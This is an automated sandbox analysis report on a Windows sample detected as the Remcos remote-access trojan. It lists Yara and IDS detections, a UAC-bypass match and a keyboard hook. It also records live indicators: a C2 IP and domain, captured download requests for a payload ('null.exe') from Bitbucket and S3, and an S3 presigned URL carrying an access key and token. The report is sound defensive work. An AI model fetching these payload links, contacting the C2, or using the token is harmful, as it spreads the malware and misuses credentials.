Windows Analysis Report
hCJ8gK9kNn.exe

AI detected suspicious sample

Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dyfwtd.exe PID: 5516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dyfwtd.exe PID: 3272, type: MEMORYSTR

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: dyfwtd.exe, 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_d3173816-3

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dyfwtd.exe PID: 5516, type: MEMORYSTR

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Unpacked PE file: 0.2.hCJ8gK9kNn.exe.2650000.2.unpack

Source: hCJ8gK9kNn.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.25.23:443 -> 192.168.2.8:49708 version: TLS 1.2

Source:	Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdb source: hCJ8gK9kNn.exe, OrionLegacyCLI.exe.0.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006F28000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3319832451.0000000009C30000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008333000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Srlfeb.pdb source: csc.exe, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3319168646.0000000009360000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000007F5C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006F28000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3319832451.0000000009C30000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008333000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdbP2N source: hCJ8gK9kNn.exe, OrionLegacyCLI.exe.0.dr
Source:	Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3319168646.0000000009360000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000007F5C000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49712 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49711 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49730 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49746 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49758 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49801 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49780 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49839 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49883 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49913 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49903 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49959 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49768 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49872 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49813 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49965 -> 181.131.217.244:1842

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: newstaticfreepoint24.ddns-ip.net

Source: global traffic

TCP traffic: 192.168.2.8:49706 -> 181.131.217.244:30203

Source: global traffic	HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIGUX6ORX&Signature=Zjqmry%2BNGZ5szyFv0hOwnpTu2lo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJIMEYCIQCGK9zub4%2FRHXDXeMN6k7XbjWwi0RJXwId9Ng33n0K%2F8QIhAN1Z2SPiS2gBnFaWWj6eia3uOu6PtMwycvP14HCcOT8YKrACCML%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwcdwWUJNKUMa%2FVym4qhALnixtfvkFlXAR1WJ687dROjrNTrlqec61HZk4xyIIbcd%2BRgXd%2Fh168iQ4%2BTw9BMZ81Zwv1RSJSVyNitKiXJcfIQRolpUMKdiNxfFyyqqcS0Tg2S3lJkWed%2BtKsHpen1E%2FDAnwDyxdvLayliINqWRXGDW9o6tVJBmDEqSXaOt6hqwZ%2FZha79%2Ff8W3BbEbePj2r6gzjnKKD7c1Ovt6LbwVJN%2B9jBhD2fyIBe5Lh3ZNbIVl4daY0oFLDS4VVAIEjburQUN4QSd7FkqlJhmbW3zmDwMI5%2Fb2gCZabQeQoSAb8VczrPcqmysGUiRjzARXLheXFHYDegGiflUK0oIiw2VGfaVRixBDCWnOy6BjqcARFHPbVaro%2BtHveeLvVVaDflun9rRVYAEJEvIZ58bqvNw79lxq2jSq9Ozh3SUPLz%2B6oHkYiGFJsYRa7HJIWuZdD%2FxHsyV%2BkzTZEx49KbjWLKQRpJvFpjW5%2FoA50n0mp2yif%2BnAmClG8k2TFNOkovlTbezxCiAoxGh4U4FenmsUB2R0Nn5Qdhp9gaPH0NelvEXmckrWNQ8H8YTiMVYQ%3D%3D&Expires=1734022430 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 181.131.217.244 181.131.217.244
Source: Joe Sandbox View	IP Address: 185.166.143.49 185.166.143.49

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIGUX6ORX&Signature=Zjqmry%2BNGZ5szyFv0hOwnpTu2lo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJIMEYCIQCGK9zub4%2FRHXDXeMN6k7XbjWwi0RJXwId9Ng33n0K%2F8QIhAN1Z2SPiS2gBnFaWWj6eia3uOu6PtMwycvP14HCcOT8YKrACCML%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwcdwWUJNKUMa%2FVym4qhALnixtfvkFlXAR1WJ687dROjrNTrlqec61HZk4xyIIbcd%2BRgXd%2Fh168iQ4%2BTw9BMZ81Zwv1RSJSVyNitKiXJcfIQRolpUMKdiNxfFyyqqcS0Tg2S3lJkWed%2BtKsHpen1E%2FDAnwDyxdvLayliINqWRXGDW9o6tVJBmDEqSXaOt6hqwZ%2FZha79%2Ff8W3BbEbePj2r6gzjnKKD7c1Ovt6LbwVJN%2B9jBhD2fyIBe5Lh3ZNbIVl4daY0oFLDS4VVAIEjburQUN4QSd7FkqlJhmbW3zmDwMI5%2Fb2gCZabQeQoSAb8VczrPcqmysGUiRjzARXLheXFHYDegGiflUK0oIiw2VGfaVRixBDCWnOy6BjqcARFHPbVaro%2BtHveeLvVVaDflun9rRVYAEJEvIZ58bqvNw79lxq2jSq9Ozh3SUPLz%2B6oHkYiGFJsYRa7HJIWuZdD%2FxHsyV%2BkzTZEx49KbjWLKQRpJvFpjW5%2FoA50n0mp2yif%2BnAmClG8k2TFNOkovlTbezxCiAoxGh4U4FenmsUB2R0Nn5Qdhp9gaPH0NelvEXmckrWNQ8H8YTiMVYQ%3D%3D&Expires=1734022430 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: navegacionseguracol24vip.org
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: newstaticfreepoint24.ddns-ip.net

Source: csc.exe, 00000003.00000002.3317409163.0000000006FF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bitbucket.org
Source: dyfwtd.exe, 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, dyfwtd.exe, 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: csc.exe, 00000003.00000002.3317409163.0000000006FF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s3-w.us-east-1.amazonaws.com
Source: csc.exe, 00000003.00000002.3317409163.00000000070AE000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006CC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hCJ8gK9kNn.exe, OrionLegacyCLI.exe.0.dr	String found in binary or memory: http://www.geomind.co.kr/
Source: hCJ8gK9kNn.exe, OrionLegacyCLI.exe.0.dr	String found in binary or memory: http://www.geomind.co.kr/Online
Source: csc.exe, 00000003.00000003.1875083635.00000000084A0000.00000004.00000800.00020000.00000000.sdmp, dyfwtd.exe, 00000006.00000000.1880838318.000000000051C000.00000020.00000001.01000000.00000008.sdmp, dyfwtd.exe, 00000006.00000002.2147868994.00000000135EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.hdsentinel.com
Source: csc.exe, 00000003.00000003.1875083635.00000000084A0000.00000004.00000800.00020000.00000000.sdmp, dyfwtd.exe, 00000006.00000000.1880838318.000000000051C000.00000020.00000001.01000000.00000008.sdmp, dyfwtd.exe, 00000006.00000002.2147868994.00000000135EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.hdsentinel.com/sendreport.phpU
Source: csc.exe, 00000003.00000003.1875083635.00000000084A0000.00000004.00000800.00020000.00000000.sdmp, dyfwtd.exe, 00000006.00000000.1880838318.000000000051C000.00000020.00000001.01000000.00000008.sdmp, dyfwtd.exe, 00000006.00000002.2147868994.00000000135EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.hdsentinel.comU
Source: HardDiskSentinelBin.exe.6.dr	String found in binary or memory: http://www.indyproject.org/
Source: csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws
Source: csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-
Source: csc.exe, 00000003.00000002.3317409163.0000000006CC1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: csc.exe, 00000003.00000002.3317409163.0000000006F28000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006CC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
Source: csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006CC1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.25.23:443 -> 192.168.2.8:49708 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\dyfwtd.exe

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_00411810 GetAsyncKeyState,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowTextA,SetWindowTextA,CallWindowProcA,

0_2_00411810

Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dyfwtd.exe PID: 5516, type: MEMORYSTR

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dyfwtd.exe PID: 5516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dyfwtd.exe PID: 3272, type: MEMORYSTR

System Summary

Source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
